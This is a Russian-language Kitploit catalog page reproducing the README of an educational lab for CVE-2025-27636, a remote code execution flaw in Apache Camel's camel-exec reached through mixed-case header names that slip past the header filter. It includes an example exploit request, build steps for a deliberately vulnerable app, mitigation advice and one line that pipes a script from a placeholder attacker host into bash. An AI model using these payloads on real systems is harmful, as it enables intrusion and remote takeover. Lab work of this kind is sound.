Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-27636-Practical-Lab — Практическая лаборатория для воспроизведения CVE-2025-27636 — критической RCE в Apache Camel через обход фильтра заголовков с учётом регистра. Демонстрирует внедрение заголовков для выполнения произвольных команд через exec endpoint. | Kitploit
Инструменты/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

Практическая лаборатория для воспроизведения CVE-2025-27636 — критической RCE в Apache Camel через обход фильтра заголовков с учётом регистра. Демонстрирует внедрение заголовков для выполнения произвольных команд через exec endpoint.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
9 месяцев назадЕщё не проверено

🛡️ CVE-2025-27636 — Практическая лаборатория эксплуатации для Apache Camel

🔍 Обзор

CVE-2025-27636 — это критическая уязвимость удаленного выполнения кода (RCE) в Apache Camel, а именно в компоненте camel-exec. Она возникает из-за тонкой, но опасной проблемы:

DefaultHeaderFilterStrategy выполняет чувствительные к регистру проверки имен заголовков, которые можно обойти, используя альтернативный регистр.

Это означает, что внутренние заголовки Camel — такие как CamelExecCommandExecutable — которые должны блокироваться, могут просочиться, если манипулировать их регистром (например, cAmeLexecCommandExecutable).

Когда этот заголовок достигает конечной точки exec:, злоумышленник может внедрить произвольные команды, что приводит к полной компрометации системы.


📌 Технические сведения

✅ DefaultHeaderFilterStrategy

DefaultHeaderFilterStrategy от Apache Camel предназначен для защиты внутренних заголовков, таких как:

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 уязвим, если регистр обходит фильтр

🔍 Что значит «внутренние»? Внутренние заголовки — это:

Заголовки с префиксом Camel*

Используются только внутри Camel для управления поведением (маршрутизацией, обработкой, конечными точками)

Не предназначены для раскрытия внешним системам, таким как HTTP, JMS и т. д.

Однако до исправления этот фильтр сопоставлял имена заголовков с учетом регистра, что нарушает спецификацию HTTP (где заголовки нечувствительны к регистру) и позволяет обходы, например:

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

Этот заголовок будет пропущен к компоненту exec:, который затем выполнит полезную нагрузку.

🛠️ CamelExecCommandExecutable

Этот заголовок указывает компоненту camel-exec, какую команду выполнить. Он мощный — и чрезвычайно опасный — если им можно управлять извне, особенно в средах, поддерживающих команды уровня ОС (например, bash, cmd.exe и т. д.).


🧪 Практическая лаборатория: Pinewood Server Diagnostic

Проект: Pinewood Server Diagnostic Автор: @enochgitgamefied Цель: Воспроизвести CVE-2025-27636 в живой, образовательной лаборатории.


🔗 Репозиторий GitHub

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 Обзор проекта

  • Создан с использованием Apache Camel 4.10.0

  • Маршруты:

    • /tasks → Выводит список задач с помощью exec:tasklist или exec:ps
    • /systeminfo → Выводит информацию об ОС (systeminfo или uname -a)
    • /network → Показывает ipconfig или ifconfig
  • Веб-интерфейс по адресу / с использованием встроенного Jetty

  • Уязвим для инъекции заголовков с измененным регистром, если фильтрация не исправлена


⚙️ Начало работы

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Сборка приложения
mvn clean package

# Запуск
java -jar target/hello-camel-1.0-SNAPSHOT.jar

Затем откройте в браузере:

🖥️ http://<ваш-ip>:8484


🚨 Демонстрация уязвимости

Неисправленное поведение:

Если отправить такой заголовок (обратите внимание на регистр):

root@kitploit:~
cAmeLexecCommandExecutable: whoami

Фильтр не блокирует его, и он передается на конечную точку exec:. Вы можете продемонстрировать:

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← опасно

🎥 Видео на YouTube

Готовится полная демонстрация, которая будет загружена в ближайшее время. В ней будут рассмотрены:

  • Настройка приложения
  • Инъекция заголовков
  • Выполнение команд
  • Шаги по устранению уязвимости

Ссылка на демонстрацию на YouTube: https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s!


🛡️ Смягчение и исправление

  1. Обновите Apache Camel до версии с фильтрацией заголовков без учета регистра (это исправлено).
  2. Используйте пользовательский HeaderFilterStrategy, если нужно применить более строгую логику.
  3. Не открывайте маршруты exec: напрямую через HTTP, если они не полностью защищены.

🧠 Ключевые выводы

  • Внутренние заголовки никогда не должны быть управляемыми для внешних пользователей.
  • Чувствительность к регистру в фильтрах безопасности — хорошо известный анти-паттерн.
  • Apache Camel мощный, но с этой мощью приходит и ответственность — особенно при связывании HTTP с exec.

⚠️ Отказ от ответственности

Эта лаборатория предназначена только для образовательных и контролируемых лабораторных целей. Никогда не пытайтесь использовать это на несанкционированных системах или сетях.

Apache Camel2
Скачать инструмент